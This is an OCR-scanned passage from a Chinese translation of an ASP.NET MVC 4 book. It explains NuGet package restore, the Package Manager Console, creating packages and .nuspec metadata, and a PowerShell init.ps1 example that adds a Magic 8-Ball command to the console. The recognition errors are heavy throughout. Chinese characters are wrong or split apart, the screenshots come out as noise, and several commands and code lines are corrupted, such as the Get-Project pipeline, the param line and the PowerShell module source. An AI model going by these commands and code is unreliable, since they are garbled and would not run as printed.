Restore 菜单 项 ， 如 图 10-12 所 示 。 这 样 就 会 打开 一 个 对 话 框 ， 上 面 显 示 解 决 方案 的 改变 信 
息 ， 如 图 10-13 所 示 。 


solution Explorer 
A 
”| Solution 'SeeGit’ (2 proje Build Solution 


四 交 


Ctrl*Shrt=B 
i Solution fterms 

ey Rebuild Solution 

. 司 SeeGitApp 

梧 Un T ests 4 Run Test(s) t+* 民 R 
Test With 
Clean Solution 
Batch Build... 


Configuratron Manager... 
曾 ”Manage NuGet Packages... 
Calculate Code Metres 


Enable NuGet Package Restore 


国 己 


Open Command Prompt 
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| Microsoft Visual Studio 


@ NuGet Package Manager 
Do you want to configure 让 1 solution to download and restore 
missing NuGet packages during build? A nuget folder will be added to 
the root of the solution that contains files that enable package restore, 


Packages installed inte Website projects will net be restored during 


build, Consider converting those into Web application projects ff 
NeECE33arYy, 
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下 如 对 话 框 中 显示 的 ， 这 样 就 会 在 我 们 解决 方案 的 根 目录 中 洪 加 一 个 名 为 .nuget 的 文 
件 夹 。 我 们 需要 确保 把 这 个 文件 夹 提 交 到 源码 控制 , 因为 它 包 含 了 局 用 包 恢 复 的 构建 任务 。 
可 喜 的 是 ， 这 个 文件 夹 中 的 内 容 很 少 改变 ， 因 此 ， 这 是 一 次 性 操作 。 

在 这 个 文件 夹 中 ， 存 在 有 三 到 四 个 文件 ， 分 别 如 下 : 

e NuGet.config: 包含 有 NuGet 的 配置 设置 。 目 前 ， 只 有 一 个 设置 disableSourceControl- 

Integration， 由 于 当局 用 包 恢 复 时 ， 我 们 不 再 需要 把 Packages 文件 夹 提 区 到 源码 控 
制 ， 因 此 ， 我 们 把 它 设置 为 true。 

e NuGet.exe: NuGet 的 命令 行 版 本 能 够 恢复 包 。 需 要 注意 的 是 , 在 NuGet 2.0 版 本 中 ， 
包 恢 复 功 能 需要 征 得 用 户 同 意 ， 用 户 可 以 通过 NuGet 设置 或 环境 变量 
EnableNuGetPackageRestore 来 同意 。 如 果 需 要 更 详细 地 了 解 NuGet， 请 参阅 NuGet 
博客 ， 网 址 为 http://blog.nuget.org/20120518/package-restore-and-consent.html。 

e NuGet.targets: MSBuild 任务 交 给 NuGetexe， 确 保 丢 失 的 包 在 编译 时 恢复 。 

e Packasges.config: 如 果 解 决 方案 中 包含 只 安装 在 解决 方案 中 ， 而 没有 在 其 他 任何 单 

独 项 目 中 安装 的 包 ， 那 么 这 些 包 会 在 该 文件 中 列 出 。 例 如 ， 添 加 命令 到 Packages 
Manager Console( 后 面 会 介绍 )， 但 不 包含 任何 程序 集 的 包 可 能 会 在 这 里 列 出 。 

司 用 包 恢 复 功能 ，Packages 文件 夹 就 不 需要 提 区 到 源码 控制 ， 相 反 ， 只 提交 源 代 体 。 
当 一 个 新 的 开发 人 员 从 版 本 控制 获取 源码 时 ， 只 需 构建 解决 方案 恢复 所 有 包 文 件 即 可 。 

NuGet 会 得 看 Packages.config 文件 中 的 每 个 包 条 目 ， 并 下 载 解 讨 这 些 包 。 注 意 ， 这 不 
需要 “安装 ” 包 。 这 里 假设 包 已 经 安装 ， 并 且 对 解决 方案 做 的 所 有 更 改 已 经 提交 。 唯 一 缺 
少 的 是 Packages 文件 夹 中 的 文件 ， 如 程序 集 和 工具 。 

10.3.6 包 管 理 器 控制 台 的 用 法 

在 之 前 的 内 容 中 笔者 曾 提 到 ， 有 两 种 方式 可 以 实现 与 NuGet 的 交互 。 下 面 讲解 第 二 种 
方式 : Package Manager Console。 这 是 Visual Studio 中 基于 PowerShell 的 控制 台 ， 提 供 了 
强大 的 功能 来 得 找 和 安 闭 包 ,， 此 外 ， 该 控制 台 还 文 持 Add Library Package Reference 对 话 框 
不 文 持 的 一 些 功能 。 
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可 按照 以 下 步骤 启动 和 使 用 控制 台 : 
(1) 启动 控制 台 : 单 击 Tools | Library Package Manager | Package Manager Console， 如 
图 10-14 所 示 。 这 样 就 进入 了 Package Manager Console， 在 这 里 可 以 执行 在 对 话 框 中 可 以 
执行 的 所 有 操作 。 
Tools Architecture Test Analyze Window Hep 


"Abort Test Run 
本 Attach to Process.., CtrisAlt*P 


Connect to Database,, 
Connect to Server.., 


Code Snippets Manager.. Ctriek, CtrleB 


回首 六 


Choose Toolbox ltems.., 

Add-in Manager,.. 

Library Package Manager 出 package Manager Console 

Manage NuGet Packages for solution,,. 


Package Visualizer 


Macros BE 


Extension Manager,.. 


画 
首 
mh 
Lo 


名 中 


Install Web Components 

Create GUID 

Error Leokup 

ATL/IMEFC Trace Toel 

Spye* 

i WCF Service Configuration Editor 
Extemal Tools,., 

Import and Export Settings... 


Customize,... 


Package Manager Settings 


Options... 
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(2) 执行 操作 : 使 用 Get-Package 命令 可 以 列举 出 联机 库 中 的 所 有 包 ， 还 可 以 提供 一 个 
搜索 过 滤器 ， 如 图 10-15 所 示 。 


Package Manager Console = 


Package source: | NuGet official package source "| oj | Default Project ' MveApplication "| | 站 国 
Each package is licensed to you by its owner,. Microsoft is not responsible for, nor does it grant any a 
licenses to, third-party packages,. Some Packages nay include dependencies which are Boverned by 
additional licenses. Follow the package SOUrce (feed) URAL to determine any dependencies. 


Package Manager Console Host Version 1.8.36423,9026 
Type "get-help NuGet" to see Bl1l] available NuGet commands. 
PM> Get-=-Package =-ListAvailable -Filter Route 


1d Desceription/Release Notes 


AttributeRouting .2.2.8 AttributeRoutine For ASP.NET MVC lets YOU sp... 
httributeRouting.WebApi Br AttributeRoutineg for ASP.NET Web API lets YO... 
httributeRoutineg.WebApi,.Hosted 2.2.2, httributeRouting for self-hosted Web APT let,. 

bar :和 B, Route Debugger is a little utility 1 wrote t... 
DesignerPpages .1.1 Allows views to be added to one directory Wi... 
elfar .日 Error Logeine Filter and Route (ELFAR) for A,.. 
Elmah .MYC 1.3, Painless integration of ELMAH functionality ,.. 


10-15 


(3) 使 用 选项 卡 扩展 : 图 10-16 展示 了 在 Install-Package 命令 中 使 用 选项 卡 扩展 的 一 个 
例子 。 顾 名 思 义 ， 该 命令 可 用 来 安装 包 。 与 智能 感知 功能 类 似 ， 选 项 卡 扩 展 展示 了 一 个 与 
已 输入 字符 匹配 的 包 的 列表 。 
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Package Manager Console 


Package source | NuGet official package source -| 租 | Default project | MvcApplication | 
PM> Install=Package Rout 


Routelvlagic 
routedebugger 
RouteMagic,\Myvc 
RoutingCenfiguration 
RouteAttribute 


图 10-16 


PowerShell 命令 的 一 个 优点 就 是 六 持 选项 卡 扩 展 ， 这 意味 
部 分 字符 的 同时 ， 单 击 Tab 键 可 以 查看 要 输入 内 容 的 一 些 选 项 。 

(4) 复合 命令 : PowerShell 也 支持 复合 命令 ， 比 如 通过 将 一 个 命令 管道 传输 到 男 一 个 
命令 。 例 如 ， 如 果 想 回 解 决 方案 中 的 每 个 项 目 安装 一 个 包 ， 可 以 运行 下 面 的 命令 : 


Ge 七 -PTOJ]Ject -AL | Install-Package log4net 


第 一 个 命令 将 检索 出 解决 方案 中 的 所 有 项 目 ， 并 将 检索 出 的 项 目 管道 输出 到 第 二 个 命 
令 ， 然 后 再 将 指定 的 包 安 装 到 这 些 项 目 中 。 

(5) 动态 添加 新 命令 : PowerShell 接口 的 强大 之 处 在 于 ， 安 装 的 一 些 包 可 以 为 shell 洪 
加 新 命令 。 例 如 ， 在 安装 MvcScaffolding 包 后 ， 控 制 台 将 会 支持 构建 控制 器 及 其 视图 的 新 
命令 。 

10-17 展示 了 MvcScaffolding 包 的 安装 ， 然 后 运行 该 包 新 旅 加 的 Scaffold 命令 。 


Package Manager Console 


Package source: | NuGet official package source ~ | Lo | Default project: ' MvcApplication 

PM> Install-Package MreScatfolding 

attemnting to resolve dependency 'TaSscattolding'. 

Bttemptine to resolve dependency 'EntityFramework (2 4.1.18311.8)". 

You are downloading EntityFramework from Microsoft, the license agreement to which is available at 下 
http://go.microsort .com/fnlink/?LinkId=224682. Check the package tor additionasl dependencies, which may 
come with their oan license agreement(s), Your vse of the package and dependencies constitutes your 
acceptance of their license agreements.,. If you do not accept the license agreement(s), then delete the 
relevant components from your device. 

SUuccessfully installed ‘EntityFramework 4.1.18715.8". 


着 您 在 输入 一 个 命令 前 边 的 


y installed 'T4Scaffolding 1.8.6°". 
installed "MeSscaffolding 1.8.7". 
added "EntityFramework 4.1.186715.8" toe MveApplication. 
' Bdded "TAScaffolding 1.8.6" to MveApplication. 
SUccessfully added MeScaffolding 1.8.7" to Myehpplication,. 


PMS Scatffold Controller Album 

Staffoldine AlbunsController, .. 

Added database context ‘Models\MveApplicationContext.cs’ 

Added 'Albums" to database context ‘MvcApplication.Models.MveApplicationContext' 
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默认 情况 下 ， 包 管理 器 控制 台 (Package Manager Console) 命 令 操纵 的 是 “Al1” 包 源 ， 


251 


258 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


该 包 源 是 所 有 配置 包 源 的 集合 。 可 以 使 用 控制 台 左 上 角 的 Package Source 下 拉 框 修改 当前 
包 源 ， 或 在 执行 命令 时 使 用 -Source 标记 指定 不 同 的 包 源 。-Source 标志 可 以 用 来 改变 命令 
执行 期 间 的 包 源 。 单 击 包 源 下 拉 框 右 侧 在 小 球 上 帝 有 第 头 图 标的 按钮 ， 打 开 包 源 配 置 对 话 
框 ， 在 其 中 可 以 修改 包 源 配置 的 信息 。 

同样 ， 包 管理 器 控制 台 将 其 命令 应 用 于 默认 项 目 。 默 认 项 目 显 示 在 控制 台 右 上 和 角 的 下 
拉 框 中 。 当 执行 一 个 包 安 装 命 令 时 ， 该 命令 只 应 用 于 默认 项 目 。 在 命令 中 使 用 -Project 标志 
可 以 将 该 命令 应 用 于 一 个 不 同 的 项 目 。 

想 了 解 更 多 包 管 理 器 控制 台 及 其 命令 的 引用 列表 ， 请 参阅 NuGet Docs， 网 址 为 


http://docs.nuget.org/docs/reference/package-manager-console-powershell-reference. 


10.4 创建 包 


尽管 NuGet 可 以 非常 容易 地 使 用 包 ， 但 是 如 果 没 有 人 创建 包 ， 它 也 是 巧 妇 难 为 无 米 之 
炊 。 这 也 是 NuGeT 团队 确保 创建 包 尽 可 能 简单 的 原因 。 

在 创建 包 前 ， 确 保 已 从 NuGet CodePlex 网 站 上 下 载 了 NuGet.exe 命令 行 应 用 程序 包 ， 
如 果 尚 未 下 载 ， 请 访问 站 点 http://nuget.codeplex.com/。 然 后 将 下 载 的 NuGet.exe 复制 到 便 
熏 驱 动 器 的 合适 位 置 ， 并 把 该 路 径 添 加 到 PATH 环境 变量 中 。 

Update 命令 可 实现 NuGet.exe 的 自动 更 新 。 例 如 ， 运 行 下 面 命令 : 


NuGet .exe update -self 


或 使 用 简短 形式 : 


Nuget u ~—self 


可 以 通过 在 NuGet.exe 当前 版 本 名 称 后 面 追 加 .old 扩展 名 来 备份 当前 版 本 ， 然 后 使 用 
NuGet.exe 的 最 新 版 本 来 蔡 换 当前 版 本 。 

安装 了 NuGet.exe 后 ， 创 建 包 需 要 三 个 步骤 : 

(1) 把 包 的 内 容 整 理 在 一 个 基于 约定 的 文件 夹 结构 中 。 

(2) 在 .nuspec 文件 中 为 创建 的 包 指 定 元 数据 。 

(3) 对 .nuspec 文件 运行 NuGet.exe 的 Pack 命令 : 


Install-Package NuGet.CommandLine 


10.4.1 打包 项 目 


在 许多 应 用 场合 中 ， 包 中 只 包含 一 个 映射 到 Visual Studio 项 目 (.csproj 或 .vbproj 文件 ) 
的 程序 集 。 这 种 情形 下 ， 创 建 NuGet 包 是 很 简单 的 。 在 命令 提示 符 下 ， 导 航 到 包含 项 目 文 
件 的 目录 ， 并 运行 以 下 命令 : 


NuGet .exe pack MyProject.cspro] ~Build 
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如 果 导 航 到 的 目录 中 只 包含 一 个 项 目 文件 ， 我 们 就 可 以 忽略 项 目 文件 名 称 。 运 行 上 面 
命令 就 会 编译 项 目 ， 并 用 项 目的 程序 集 元 数据 填充 NuGet 元 数据 。 
不 过 ， 通 童 情况 下 ， 我 们 想 目 定义 包 元 数据 。 可 以 通过 下 面 命令 来 实现 : 


NuGet .exe spec MyProject.cspro] 


这 样 就 会 创建 一 个 .nuspec 文件 (本 节 后 面 会 进行 介绍 )， 其 中 包含 了 用 于 从 程序 集中 检 
索 信息 的 更 换 令 牌 。 如 果 需 要 更 详细 地 了 解 这 方面 内 容 ， 请 参阅 NuGet 文档 ， 网 址 为 
http://docs.nuget.org/docs/creatine-packages/creatine-and-publishine-a-package。 


10.4.2 打包 文件 夹 


NuGet 也 可 以 基于 文件 严 结 构 来 创建 包 。 当 不 能 简单 地 从 项 目 映 射 到 包 时 ， 这 一 功能 
就 具有 很 大 意义 。 例如， 为 使 程序 在 不 同 版 本 的 .NET 框架 中 运行 , 包 中 可 能 就 会 包含 多 个 
版 本 的 程序 集 。 
默认 情况 下 ，NuGet Pack 命令 递归 包括 指定 的 .nuspec 文件 所 在 文件 夹 下 的 所 有 文件 。 
通过 在 .nuspec 文件 中 指定 要 包含 的 文件 集 ， 可 以 宪 新 这 个 默认 设置 。 
包 中 包含 三 种 类 型 的 文件 ， 如 表 10-1 所 示 。 
表 10-1 包 中 的 文件 类 型 


文件 夹 名 称 描 述 
Lib 其 中 包含 的 每 个 程序 集 (.dll 文件 ) 在 目标 项 目 中 都 作为 一 个 程序 集 来 引用 
Content 当 包 安装 完毕 时 ， 该 文件 夹 中 的 文件 会 被 复制 到 应 用 程序 的 根 目 录 下 。 如 果 文 件 
的 扩展 名 是 .pp 或 .transform， 那 么 在 复制 之 前 会 进行 转换 
Tools 包含 一 些 可 能 在 解决 方案 安装 或 初始 化 过 程 中 运行 的 PowerShell 肚 


可 在 包 管 理 器 控制 台中 访问 的 程序 


通常 情况 下 ， 在 创建 包 时 ， 需 要 为 创建 的 包 设 置 一 个 或 多 个 带 有 所 需 文 件 的 默认 文件 
夹 。 大 部 分 的 包 会 向 项 目 中 添加 一 个 程序 集 ， 所 以 详细 地 了 解 lib 文件 夹 的 结构 是 很 有 必 
要 的 。 

如 果 使 用 包 的 开发 人 员 需 要 包 人 额外 的 详细 信息 ,可 参阅 包 根 目录 下 的 readme.txt 文件 。 
通常 情况 下 ， 当 包 和 安装 过 程 完成 时 ，NuGet 会 打开 readme.txt 文件 。 然 而 ， 为 了 避免 打开 
- 连 串 的 readme 文件 ， 只 有 当 开 发 人 员 直 接 安 装 包 时 ， 才 会 打开 相应 包 的 readme 文件 ， 
而 那些 作为 依赖 包 安 装 的 包 ， 不 会 打开 对 应 的 readme 文件 。 

10.4.3 NuSpec 文件 


当 创 建 包 时 ， 我 们 需要 指定 一 些 关于 该 包 的 信息 ， 如 包 也 、 描 述 和 作者 等 。 所 有 这 些 
元 数据 都 在 .nuspec 文件 中 以 XML 格式 指定 。.nuspec 文件 也 用 来 驱动 包 的 创建 ， 并 在 创建 
完成 之 后 ， 包 含 在 包 中 。 

可 以 使 用 NuGet Spec 命令 生成 一 个 样板 文件 ， 以 快速 开始 编写 NuSpec 文件 。 然 后 使 
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用 AssemblyPath 标志 和 程序 集中 存储 的 元 数据 生成 NuSpec 文件 。 例 如 ， 现 在 有 一 个 名 为 
MusicCategorizer.dll 的 程序 集 ， 以 下 命令 将 从 程序 集 的 元 数据 生成 一 个 NuSpec 文件 : 


nuget spec ~AssemblyPath MusicCategorizer.dll 


这 个 命令 会 生成 下 面 的 NuSpec 文件 : 


<2?2xml version="].0"?> 
<package xmlns="http://schemas.microsoft.com/packaging/2010/07/nuspec.xsd"> 
<metadata> 
<id>MusicCategorizer</id> 
<Vversion>1.0.0.0</version> 
<title>MusicCategorizer</title> 
<authors>Haackbeat Enterprises</authors> 
<OWNers>Owner here</owners> 
<licenseUrl>http://LICENSE URL HERE OR DELETE THIS LINE</licenseUrl> 
<projectUrl>http://PROJECT URL HERE OR DELETE THIS LINE</projectUrl> 
<iconUrl>http://ICON URL HERE OR DELETE THIS LINE</iconUrl1> 
<requireLicenseAcceptance>false</requireLicenseAcceptance> 
<description> 
Categorizes music into genres and determines beats Per minute (BPM) of 
a Song. 
</description> 
<tags>Tagl Tag2</tags> 
<dependenclies> 
<dependency id="SampleDependency" version="1.0™" /> 
</dependencies> 
</metadata> 
</package> 


从 代码 中 可 以 看 出 , 所 有 NuSpec 文件 都 以 外 层 <packages> 元 素 开 始 。 该 元 素 必须 包含 
-个 <metadata> 子 元 素 ， 并 包含 一 个 可 选 的 <files> 元 素 ， 后 和 耐 会 讲解 这 一 点 。 如 果 我 们 遵 
照 前 面 提 到 的 文件 夹 结构 约定 ， 那 么 <files> 元 素 就 没 必 要 了 。 


10.4.4 ”元 数据 
表 10-2 列 出 了 NusSpec 文件 的 <metadata> 节 点 中 包含 的 元 素 。 


表 10-2 metadata 元 素 


元 素 描 述 
id 必需 的 。 包 的 唯一 标识 符 
version 必需 的 。 包 的 版 本 ， 使 用 多 达 四 个 版 本 段 的 标准 版 本 格式 (如 1.1 或 1.1.2 或 
1.1.2.5) 
title 包 的 人 性 化 标题 。 如 果 省 略 ， 就 会 显示 D 
authors 必需 的 。 以 和 有 逗 号 分 隔 的 包 代 码 的 作者 列表 
OWners 以 逗号 分 隔 的 包 的 创建 者 列表 。 这 个 列表 往往 与 作者 列表 相同 (虽然 是 不 必 


要 的 )。 注 意 当 把 包 上 传 到 库 时 ， 库 中 的 账户 会 取代 这 个 字段 


元 素 
licenseUrl 
projectUrl 


1CONUT] 


requireLicenseAcceptance 


description 


releaseNotes 


tags 
frameworkAssemblies 


references 


dependencles 
laneuage 
copyright 
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包 许可 条 球 的 链接 

包 首 页 的 Url， 首 页 上 有 更 多 关于 包 的 信息 

在 对 话 框 中 作为 包 图 标 使 用 的 图 像 的 URL。 该 图 像 是 一 个 具有 透明 背景 的 

32X 32 像素 的 .png 文件 

一 个 bool 类 型 值 ， 指 示 客 户 端 在 安装 包 之 前 ， 是 否 需 要 确保 接受 包 许 可 条 

款 (licenseUrl 指向 的 页 面 内 容 ) 

必需 的 。 包 的 详细 描述 ， 显 示 在 包 管 理 器 对 话 框 的 右 侧 窗 格 中 

包 在 当前 版 本 中 所 做 的 更 改 。 当 查看 包 更 新 时 , 我 们 应 该 阅读 发 布 说 明 ， 而 

不 是 描述 

一 个 由 衬 格 分 隔 的 标签 和 关键 字 列 表 ， 用 来 描述 包 

.NET 框架 程序 集 引 用 列表 ， 这 些 引 用 会 添加 到 目标 项 目 中 


lib 文件 夹 中 的 程序 集 名 称 ， 这 里 的 名 称 会 作为 程序 集 引 用 添加 到 项 目 中 。 


如 果 想 添加 lib 文件 夹 下 的 所 有 程序 集 ， 就 采用 该 元 素 的 默认 值 ， 也 就 是 把 
该 元 素 置 宝 。 如 果 指 定 了 引用 ， 仅 把 指定 的 引用 添加 到 项 目 

通过 <dependency> 子 元 素 指 定 的 包 的 依赖 项 列表 

为 包 设 置 的 微软 区 域 DD 字符 串 (或 LCID 字符 串 )， 如 en-us 

包 的 版 权 信息 

包 的 简短 描述 ， 展 示 在 包 管 理 器 对 话 框 的 中 间 窗 格 中 


由 于 包 的 ID 必须 是 唯一 的 ， 因 此 认真 地 选择 ID 非常 重要 。 在 执行 命令 安装 或 更 新 包 


时 ， 通 音 用 ID 来 标识 


包 ID 的 格式 与 .NET 名 称 空 间 的 命名 规则 是 一 样 的 。 因 此 ，MnusicCategorizer 和 
MusicCategorizer. Mvc 是 有 效 的 包 ID， 而 MusicCategorizerll!Web 是 无 效 的 。 


10.4.5 ”依赖 库 


许多 包 都 不 是 独立 开发 的 ， 它 们 本 身 都 或 多 或 少 地 依赖 于 其 他 库 。 如 果 依赖 的 这 些 库 
可 以 NuGet 包 的 形式 获得 的 话 ， 最 好 就 不 在 包 中 包含 它们 ， 而 是 在 包 的 元 数据 中 把 它们 指 
定 为 包 的 依赖 库 。 如 果 那 些 依赖 库 没有 以 包 的 形式 存在 , 我 们 可 以 考虑 联系 它们 的 所 有 者 ， 


帮助 他 们 把 库 打 包 。 


每 个 <dependency> 元 素 都 包含 两 部 分 主要 信息 ， 如 表 10-3 所 示 。 


id 


Werslon 


表 10-3 dependency 元 素 
措 述 
依赖 的 包 ID 
可 能 依赖 的 包 版 本 的 范围 
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从 表 10-3 中 可 以 看 出 ，version 特性 指定 了 版 本 范围 。 默 认 情 况 下 ， 如 果 只 输入 一 个 
版 本 号 ， 例 如 <dependency id="MusicCategorizer”version"1.0"/>， 就 表明 该 版 本 号 是 依赖 
包 的 最 小 版 本 号 。 在 上 和 面 的 例子 中 ，version="1.0" 就 指定 了 依赖 库 的 最 小 版 本 号 是 1.0， 即 
依赖 的 MusicCategorizer 包 必 须 是 1.0 及 其 后 续 版 本 。 
如 果 需 要 更 多 地 控制 依赖 库 ， 可 以 使 用 间隔 符号 来 指定 范围 。 表 10-4 展示 了 指定 版 本 
范围 的 多 种 方法 。 
表 10-4 版 本 范围 


范 国 意 义 

1.0 1.0 及 其 以 上 版 本 。 使 用 最 普遍 的 用 法 ， 本 书 推荐 使 用 
[1.0.2.0) 1.0~2.0 之 间 的 版 本 ， 其 中 包括 1.0 版 本 ， 但 不 包括 2.0 版 本 
,1.0 1.0 及 其 以 下 版 本 

(.1.0) 1.0 以 下 版 本 

[1.0] 1.0 版 本 

(1.0.) 1.0 以 上 版 本 


(1.0.2.0) 1.0 一 2.0 之 间 的 版 本 ， 其 中 既 不 包括 1.0 版 本 ， 也 不 包括 2.0 版 本 
[1.0.2.0] 1.0 一 2.0 之 间 的 版 本 ， 其 中 既 包 括 1.0 版 本 ， 也 包括 2.0 版 本 
(1.0,2.0] 1.0 一 2.0 之 间 的 版 本 ， 其 中 不 包括 1.0 版 本 ， 但 包括 2.0 版 本 
(1.0) 无 效 的 版 本 范围 设置 

Empt 所 有 版 本 


- 般 情况 下 ， 推 荐 只 指定 一 个 版 本 范围 的 下 界 。 在 许多 应 用 场合 中 ， 这 种 方法 可 以 给 
安装 包 的 人 更 多 的 机 会 使 用 包 , 而 不 会 因为 该 包 依 赖 项 的 更 新 导致 过 早 地 终止 了 它 的 使 用 。 
对 于 强 命名 的 程序 集 ，NuGet 会 自动 地 向 配置 文件 中 添加 合适 的 程序 集 绑 定 重 定向 。 

想 深 入 了 解 NuGet 所 利用 的 版 本 策略 ， 请 参阅 David Ebbo 的 系列 博客 ， 网 址 为 
http://blog.davidebbo.com/2011/01/nuget-versionine-part-1-takinge-on-dll.html, 


10.4.6 ”指定 要 包含 的 文件 


如 果 遵 照 前 面 描述 的 文件 夹 结 构 约 定 , 就 没 必 要 在 .nuspec 文件 中 指定 要 包含 的 文件 列 
表 。 但 在 一 些 应 用 场合 中 ， 可 能 需要 显 式 地 指出 要 包含 的 文件 。 例 如 ， 在 一 些 包 的 构建 过 
程 中 ， 我 们 宁愿 选择 要 包含 的 文件 ， 也 不 愿 把 这 些 文件 复制 到 基于 约定 的 文件 夹 结构 中 。 
可 使 用 <files> 元 素 指 定 要 包含 的 文件 。 

注意 ， 如 果 指 定 了 文件 ， 就 会 忽略 约定 ， 而 包 中 只 包括 .nuspec 文件 中 列 出 的 文件 。 

<files> 元 素 是 <package> 元 素 的 可 选 子 元 素 ， 其 中 包含 一 组 <file> 元 素 。 每 个 <file> 元 素 
指定 了 包 中 所 包含 文件 的 原始 位 置 和 目标 位 置 。 表 10-5 描述 了 这 些 特性 。 


262 


第 10 章 NuGet 


表 10-5 版 本 范围 
属 性 描 述 
srC 包含 文件 (或 文件 组 ) 的 位 置 。 相 对 于 NuSpec 文件 的 路 径 ， 除 非 指 定 的 是 绝对 路 径 。 
支持 通配符 "*"， 两 个 通配符 "**" 则 表示 递归 目录 查找 
target 可 选项 。 文 件 或 文件 组 的 目标 路 径 。 在 包 中 是 一 个 相对 路 径 ， 例 如 ，target="]ib"， 或 
target="libnet40"， 此 外 ， 还 有 其 他 一 些 典 型 值 ，target="content" 或 target="tools" 


下 面 展 示 了 一 个 血型 的 <files> 元 素 ; 


<files> 

<file src="bin\Release\* .dll1l" target="]ib"™" /> 
<file src="bin\Release\* .pdb" target="]1ib"™" /> 
<file src="tools\**\*.#" target="tools™ /> 
</files> 


所 有 路 径 都 会 被 解析 成 相对 于 .nuspec 文件 的 路 径 ， 除 非 指定 了 绝对 路 径 。 想 了 解 
<files> 元 素 的 更 多 信息 ， 请 查阅 NuGet 文档 的 规范 说 明 ， 网 址 为 http://docs.nuget.org/docs/ 


reference/nuspec-reference.。 
10.4.7 工具 


包 中 可 以 包含 安装 或 卸载 时 自动 执行 的 PowerShell 脚本 。 一些 脚 本 可 以 向 控制 台 添加 
新 的 命令 ， 如 MvcScaffolding 包 。 
下 面 展示 一 个 同 包 管理 器 控制 台 添 加 新 命令 的 例子 。 在 该 场合 中 ， 尽 管 包 不 是 特别 有 
用 ， 但 它 能 说 明 一 些 有 用 的 概念 。 
我 一 直 很 乾 欢 玩 “ 神 奇 8 与 球 ”(Magic 8-Bal) 这 个 游戏 。 不 热 悉 这 个 游戏 不 要 楷 ， 它 
的 游戏 规则 非常 简单 。 它 是 一 个 大 号 的 8 号 球 ( 打 台球 或 口袋 台球 时 使 用 的 那 种 )。 首 先 ， 
问 8 号 球 任意 一 个 答案 为 yes 或 no 的 问题 ， 然 后 摇 一 摇 8 号 球 , 之 后 会 出 现 一 个 请 晰 的 小 
窗口 ， 我 们 能 够 看 到 20 面体 (20 面 ) 的 一 面 ， 上 面 显示 有 问题 的 答案 。 
可 以 创建 目 己 的 神奇 8 号 球 版 本 ， 然 后 将 其 打包 成 能 回 控 制 台 添加 新 的 PowerShell 命 
令 的 包 。 我 们 从 编写 名 为 initpsl 的 脚本 开始 。 按 照 约 定 ， 包 的 tools 文件 夹 中 珊 有 该 名 称 
的 脚本 会 在 解决 方案 打开 时 执行 ， 人 允许 加 控制 台 添 加 命令 。 
表 10-6 展示 了 一 个 包含 所 有 特殊 PowerShell 脚本 的 列表 ， 当 NuGet 执行 这 些 脚 本 时 ， 
它们 必须 都 包含 在 包 的 tools 文件 夹 中 。 
表 10-6 ”特殊 的 PowerShell 脚本 
名 称 描 述 
Initpsl 它 在 包 第 一 次 安装 到 解决 方案 的 项 目 中 时 执行 .如果 同样 的 包 被 安装 到 同一 解决 方案 
的 其 他 项 目 中 , 在 安装 过 程 中 该 脚本 不 再 执行 。 该 脚本 也 在 每 次 在 Visual Studio 中 打 
开 解 决 方案 时 执行 。 它 对 于 同 包 管理 器 控制 台 添 加 新 命令 特别 有 用 
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( 续 表 ) 
名 称 描 述 
Install psl 当 包 安装 到 项 目 时 执行 。 如 果 同 样 的 包 被 安装 到 同一 解决 方案 的 多 个 项 目 中 , 该 脚本 
在 每 次 安装 包 时 都 会 执行 。 这 对 于 在 NuGet 正常 步骤 以 外 采取 其 他 安装 步骤 时 特别 
有 用 


Uninstallpsl | 在 包 每 次 从 项 目 中 基 载 时 执行 。 这 对 于 NuGet 清除 包 的 操作 非常 有 用 


当 调 用 这 些 脚 本 时 ，NuGet 会 传递 进来 一 组 参数 ， 如 表 10-7 所 示 。 


表 10-7 NuGet PowerShell 脚本 的 参数 
名 称 描 述 
$installPath | 包 安 装 的 路 径 
$toolsPath 在 包 的 安装 目录 中 ，tools 目录 的 路 径 
$package 包 的 一 个 实例 
$project 包 安 装 到 的 项 目 。 在 initpsl 脚本 中 该 参数 的 值 为 null， 因 为 它 运 行 在 解决 方案 级 别 


init.psl 脚本 非 芝 简单， 它 只 需 导 入 包含 真实 逻辑 的 PowerShell 代码 块 : 


param(s$installPrath, S$toolsPath, spackage, Sproject) 
Import-Module (Join-Path StoolsPath MagicEightBall .psml) 


其 中 ， 第 一 行 代 但 声明 了 NuGet 在 调用 脚本 时 ， 将 传递 给 脚本 的 参数 。 

第 二 行 导入 了 名 为 “MasgicEightBallpsml” 的 模块 。 这 是 PowerShell 模块 脚本 ， 其 中 
包含 了 准备 编写 的 新 命令 的 逻辑 。 正 如 上 面 所 描述 的 ， 该 模块 与 init.psl 脚本 位 于 同一 目录 
下 ， 也 即 在 tools 目录 下 。 这 正 是 需要 把 $toolsPath( 到 达 tools 目录 的 路 径 ) 和 模块 名 称 连接 
起 来 ， 从 而 得 到 模块 脚本 文件 完整 路 径 的 原因 。 

下 面 是 MagicEightBallpsml 的 源 代码 : 


SamnsweTs = “AS I See 1 七 ， YeS”， 
“Reply hazy, try agaln ， 
“Outlook not so good™ 


function Get-Answer($squestion) { 
srand = New-Object System.Random 
return Sanswers[srand.Next (0, sanswers.Length)] 


} 


Register-TabExpansion "Get-Answer'" @I1 
"question" = 1 
"Is this my lucky day?"™, 
"Will it rain tonight?"™, 
"Do I Watch too much TV2" 
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} 
Export—-ModuleMember Get—Answer 


下 面 对 以 上 代码 做 一 下 解释 : 

e 第 一 行 代码 声明 了 可 能 的 答案 的 数组 。 真实 的 神奇 8 号 球 游戏 有 20 种 可 能 的 答案 ， 
简单 起 见 ， 我 们 只 有 3 种 。 

e 下 个 代码 块 声 明了 一 个 名 为 Get-Answer 的 函数 。 这 是 向 包 管理 器 控制 台 添 加 的 新 
命令 。 它 生成 一 个 位 于 0~3 之 间 ( 包 含 0 而 不 包含 3) 的 随机 整数 ， 然 后 以 该 随机 数 
作为 数组 的 下 标 ， 返 回 该 下 标 对 应 的 答案 。 

e 下 一 段 代码 通过 Register-TabExpansion 方法 为 新 命令 注册 选项 卡 扩展 , 这 是 一 个 为 
函数 提供 类 似 于 智能 感知 的 选项 卡 的 非常 整洁 的 方式 。 第 一 个 参数 是 被 提供 选项 卡 
扩展 的 函数 的 名 称 。 第 二 个 参数 是 字典 ,用 来 为 函数 的 每 一 个 参数 提供 可 能 的 选项 
卡 扩展 值 。 字 典 中 的 每 一 个 条 目 都 有 一 个 对 应 于 参数 名 称 的 键 。 在 本 例 中 ， 我 们 只 
有 一 个 参数 一 一 question。 每 一 个 问题 可 能 对 应 有 多 个 答案 。 尽 管 代码 示例 只 提供 
